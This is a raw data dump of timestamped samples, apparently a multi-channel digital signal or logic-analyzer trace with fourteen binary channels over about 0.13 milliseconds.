1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2044200e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,6.2044680e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,6.2044920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2045000e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2045160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2045400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2045680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2045880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2046160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2046400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2046680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2046920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2047160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2047400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2047680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2047880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2048160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2048400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2048680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2048920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2049160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2049400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2049680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2049880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2050160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2050400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2050680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2050920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2051160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2051400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2051640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2051880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2052160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2052400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2052680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2052920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2053160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2053400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2053640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2053880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2054160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2054400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2054680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2054920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2055160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2055400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2055640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2055880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2056160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2056400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2056680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2056920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2057160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2057400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2057640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2057880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2058160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2058400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2058680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2058920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2059160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2059400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2059640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2059880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2060160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2060400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2060680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2060920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2061160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2061400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2061640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2061880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2062160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2062440e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2062680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2062920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2063160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2063400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2063640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2063880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2064160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2064400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2064680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2064920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2065160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2065400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2065640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2065880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2066160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2066400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2066680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2066920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2067160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2067400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2067640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2067880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2068160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2068400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2068680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2068920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2069160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2069400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2069640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2069880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2070160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2070400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2070680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2070920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2071160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2071400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2071640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2071880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2072160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2072400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2072680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2072920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2073160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2073400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2073640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2073880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2074160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2074400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2074680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2074920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2075160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2075400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2075640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2075880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2076160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2076400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2076680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2076920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2077160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2077400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2077640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2077880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2078160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2078400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2078680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2078920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2079160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2079400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,6.2079640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,6.2079880e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,1,6.3316600e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.3318520e-03 0,0,0,0,0,0,0,0,0,0,0,1,0,1,6.3318760e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.3319000e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,6.3321720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.3321960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,6.3322200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.3322440e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,1,6.3322520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,1,6.3322720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,1,6.3322960e-03 0,0,0,0,0,0,0,0,0,0,1,0,0,1,6.3323000e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.3323040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,6.3323160e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,1,6.3323480e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,1,6.3323720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,1,6.3323960e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.3324040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,6.3324200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.3324440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,6.3324720e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3324920e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3324960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3325240e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,6.3325480e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3325520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3325720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3325960e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3326200e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3326440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3326720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3326960e-03 0,0,0,0,0,0,0,0,0,0,1,0,0,0,6.3327000e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3327040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3327240e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,6.3327480e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3327520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3327720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3327960e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3328040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3328200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3328440e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3328520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3328720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3328960e-03 0,0,0,0,0,0,0,0,0,0,1,0,0,0,6.3329000e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3329040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3329240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3329480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3329720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3329960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3330200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3330440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3330720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3330960e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3331000e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3331240e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3331480e-03 0,0,0,0,0,0,0,0,0,0,1,0,0,0,6.3331520e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3331560e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3331720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3331960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3332200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3332440e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3332520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3332720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3332960e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3333240e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3333480e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3333720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3333960e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3334040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3334200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3334440e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3334520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3334720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3334960e-03 0,0,0,0,0,0,0,0,0,0,1,0,0,0,6.3335000e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3335040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3335240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3335480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3335720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3335960e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,6.3336000e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3336040e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3336200e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3336440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3336720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3336960e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3337240e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3337480e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3337720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3337960e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3338040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3338200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3338440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3338720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3338960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3339240e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,6.3339480e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3339520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3339720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3339960e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3340040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3340200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3340440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3340720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3340960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3341240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3341480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3341720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3341960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3342200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3342440e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3342520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3342720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3342960e-03 0,0,0,0,0,0,0,0,0,0,1,0,0,0,6.3343000e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3343040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3343240e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,6.3343480e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3343520e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3343720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3343960e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3344200e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3344440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3344720e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3344960e-03 0,0,0,0,0,0,0,0,0,0,1,0,0,0,6.3345000e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3345040e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3345240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3345480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3345720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3345960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3346200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3346440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3346720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3346960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3347240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3347480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3347720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3347960e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3348000e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3348200e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3348440e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3348520e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3348720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3348960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3349240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3349480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3349720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3349960e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3350000e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,6.3350200e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,6.3350440e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3350520e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3350720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3350960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3351240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3351480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3351720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3351960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3352200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3352440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3352720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3352960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3353200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3353480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3353720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3353960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3354200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3354440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3354720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3354960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3355160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3355480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3355720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3355960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3356200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3356440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3356720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3356960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3357160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3357480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3357720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3357960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3358200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3358440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3358720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3358960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3359240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3359480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3359720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3359960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3360200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3360440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3360720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3360960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3361160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3361480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3361720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3361960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3362200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3362440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3362720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3362960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3363200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3363480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3363720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3363960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3364200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3364440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3364720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3364960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3365160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3365480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3365720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3365960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3366200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3366440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3366720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3366960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3367240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3367480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3367720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3367960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3368200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3368440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3368720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3368960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3369240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3369480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3369720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3369960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3370200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3370440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3370720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3370960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3371240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3371480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3371720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3371960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3372200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3372440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3372720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3372960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3373240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3373480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3373720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3373960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3374200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3374440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3374720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3374960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3375240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3375480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3375720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3375960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3376200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3376440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3376720e-03 